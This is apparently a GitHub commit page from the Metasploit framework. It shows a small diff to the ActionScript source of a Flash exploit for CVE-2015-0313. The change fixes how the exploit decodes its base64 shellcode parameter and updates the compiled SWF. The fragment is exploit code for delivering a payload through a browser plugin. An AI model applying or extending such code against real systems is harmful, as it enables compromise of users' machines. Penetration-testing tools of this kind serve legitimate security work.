Skip to content

Commit 23d244b

Browse files
committed
1 parent 5c8c5ae commit 23d244b

File tree

2 files changed

+5
-2
lines changed
  • data/exploits/CVE-2015-0313
  • external/source/exploits/CVE-2015-0313

2 files changed

+5
-2
lines changed

data/exploits/CVE-2015-0313/msf.swf

86 Bytes
Binary file not shown.

external/source/exploits/CVE-2015-0313/Main.as

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,10 @@ public class Main extends Sprite
3939

4040
private function mainThread():void
4141
{
42-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
42+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
43+
var pattern:RegExp = / /g;
44+
b64_payload = b64_payload.replace(pattern, "+")
45+
b64.decode(b64_payload)
4346
payload = b64.toByteArray().toString()
4447

4548
ba.length = 0x1000
@@ -204,4 +207,4 @@ public class Main extends Sprite
204207
return addr + i
205208
}
206209
}
207-
}
210+
}

0 commit comments

Comments
 (0)